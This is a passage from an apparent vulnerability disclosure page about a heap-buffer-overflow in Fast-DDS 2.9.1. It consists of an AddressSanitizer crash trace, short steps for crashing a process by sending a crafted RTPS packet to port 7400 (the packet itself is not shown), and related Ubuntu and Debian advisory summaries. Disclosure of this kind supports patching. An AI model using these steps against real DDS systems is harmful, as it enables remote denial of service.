    #2 0x7f2e012c1ed9 in eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp>&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:42:17
    #3 0x7f2e0131a8d2 in eprosima::fastdds::rtps::UDPTransportInterface::CreateInputChannelResource(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastrtps::rtps::Locator_t const&, bool, unsigned int, eprosima::fastdds::rtps::TransportReceiverInterface*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPTransportInterface.cpp:234:41
    #4 0x7f2e0131a53c in eprosima::fastdds::rtps::UDPTransportInterface::OpenAndBindInputSockets(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, bool, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPTransportInterface.cpp:207:60
    #5 0x7f2e012ead04 in eprosima::fastdds::rtps::UDPv4Transport::OpenInputChannel(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPv4Transport.cpp:327:42
    #6 0x7f2e01171368 in eprosima::fastrtps::rtps::ReceiverResource::ReceiverResource(eprosima::fastdds::rtps::TransportInterface&, eprosima::fastrtps::rtps::Locator_t const&, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:43:40
    #7 0x7f2e01169b73 in eprosima::fastrtps::rtps::NetworkFactory::BuildReceiverResources(eprosima::fastrtps::rtps::Locator_t&, std::vector<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource>, std::allocator<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource> > >&, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/NetworkFactory.cpp:74:81
    #8 0x7f2e0117a526 in eprosima::fastrtps::rtps::RTPSParticipantImpl::createReceiverResources(eprosima::fastdds::rtps::LocatorList&, bool, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:1680:60
    #9 0x7f2e01175fd2 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:355:28
    #10 0x7f2e01176bd8 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:449:87
    #11 0x7f2e01196fa8 in eprosima::fastrtps::rtps::RTPSDomainImpl::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:216:76
    #12 0x7f2e011961d5 in eprosima::fastrtps::rtps::RTPSDomain::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:88:45
    #13 0x7f2e0127add3 in eprosima::fastdds::dds::DomainParticipantImpl::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantImpl.cpp:269:45
    #14 0x7f2e012a08e5 in eprosima::fastdds::dds::DomainParticipant::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/domain/DomainParticipant.cpp:110:43
    #15 0x7f2e0126e9d9 in eprosima::fastdds::dds::DomainParticipantFactory::create_participant(unsigned int, eprosima::fastdds::dds::DomainParticipantQos const&, eprosima::fastdds::dds::DomainParticipantListener*, eprosima::fastdds::dds::StatusMask const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantFactory.cpp:187:58
    #16 0x557885 in HelloWorldSubscriber::init() (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x557885)
    #17 0x564840 in main (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x564840)
    #18 0x7f2dffd39082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x474522) in memcpy
Shadow bytes around the buggy address:
  0x0c047fffebb0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
  0x0c047fffebc0: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa 00 fa
  0x0c047fffebd0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c047fffebe0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 fa
  0x0c047fffebf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fffec00: fa fa 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc

Run any fastdds process on domain 0.
Send the RTPS packet above to 127.0.0.1:7400.

This can remotely crash any Fast-DDS process.

Related news

Ubuntu Security Notice USN-6306-1

Ubuntu Security Notice 6306-1 - It was discovered that Fast DDS incorrectly handled certain inputs. A remote attacker could possibly use this issue to cause a denial of service and information exposure. This issue only affected Ubuntu 22.04 LTS. It was discovered that Fast DDS incorrectly handled certain inputs. An attacker could possibly use this issue to cause a crash.

Debian Security Advisory 5481-1

Debian Linux Security Advisory 5481-1 - Multiple security issues were discovered in Fast DDS, a C++ implementation of the DDS (Data Distribution Service), which might result in denial of service or potentially the execution of arbitrary code when processing malformed RTPS packets.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE